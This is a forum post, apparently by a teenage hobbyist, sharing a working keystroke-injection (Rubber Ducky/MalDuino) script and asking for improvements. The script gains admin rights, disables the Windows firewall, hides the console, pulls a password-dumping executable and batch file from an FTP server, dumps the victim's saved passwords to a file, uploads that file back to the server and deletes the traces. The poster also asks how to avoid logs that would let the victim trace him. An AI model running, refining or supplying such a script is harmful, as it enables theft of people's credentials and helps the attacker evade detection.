Jump to content

Recommended Posts

Posted (edited)

At first: I´m sorry for my bad English, I´m only 14 and german ^^

So I just wrote this Rubber Ducky Script that downloads a .exe and a .bat from my FTP Server. Then it executes the .exe with the .bat file what creates a .txt file with all the passwords of the victim (of course me when I forgot my passwords :P). Then it deletes the .exe and .bat and uploads the .txt back to my server (it gets deleted after that, too.).

Here´s the script:

DELAY 1000
REM
REM start cmd
REM
REM
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
STRING Alt j												
DELAY 1000													
REM
REM
REM disable firewall
REM
REM
STRING netsh advfirewall set currentprofile state off 
ENTER
DELAY 500
REM color unreadable
REM
STRING mode con:cols=18 lines=1										
ENTER													
STRING color FE												
ENTER													
REM
REM
REM download FTP
REM
STRING ftp myftpserver.com
ENTER
DELAY 1000
STRING username
ENTER
DELAY 1000
STRING password
ENTER
DELAY 500
STRING lcd C:\
ENTER
DELAY 100
STRING binary
ENTER
DELAY 100
STRING GET i.exe
ENTER 
DELAY 8000
STRING lcd C:\
ENTER
DELAY 100
STRING binary
ENTER
DELAY 100
STRING GET r.bat
ENTER
DELAY 800
STRING by
ENTER
DELAY 500
REM
REM
REM PASSWORD STEAL
REM
REM
REM
STRING cd C:\
ENTER
DELAY 500
STRING r.bat
ENTER
DELAY 10000
STRING del r.bat
ENTER
DELAY 500
STRING del i.exe
ENTER
REM
REM
REM
REM UPLOAD
REM
REM
REM
REM
DELAY 500
STRING ftp myftpserver.com
ENTER
DELAY 1000
STRING username
ENTER
DELAY 1000
STRING password
ENTER
DELAY 1000
STRING lcd c:\
ENTER
DELAY 100
STRING ascii
ENTER
DELAY 100
DELAY 800
STRING put p.txt
ENTER
DELAY 500
STRING bye
ENTER
DELAY 300
STRING del c:\p.txt
ENTER
DELAY 200
STRING netsh advfirewall set currentprofile state on
ENTER

I´m right now working on decreasing the delays, but the download and upload delays are hard to time because it obviously depends on the internet speed the victim has. 

My ideas to improve this script:

Leave the first FTP windows open so I don´t need to log in again(Cons: 1.I could get thrown out of the session after some time 2. I probably wouldn´t be able to switch with ALT + TAB because I don´t what other windows the victims has open)

My question:

Does this leave something like a log file? So that the victim could trace me back? If so, where would it be located?

 

Do you guys have some suggestions? I would love to hear them :D

Disclaimer: I can´t put the .exe on my Rubber Ducky using the Twin Duck method because I am using the MalDuino from Seytonic (basically cheap RubberDucky) which cannot be used as a Twin Duck.

Thanks for your answers,

contrix_

Edit:

This is the batchfile:

i /stext p.txt

Disclaimer 2: Everything works fine without any problems.

 

Edited by contrix_
Grammar

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...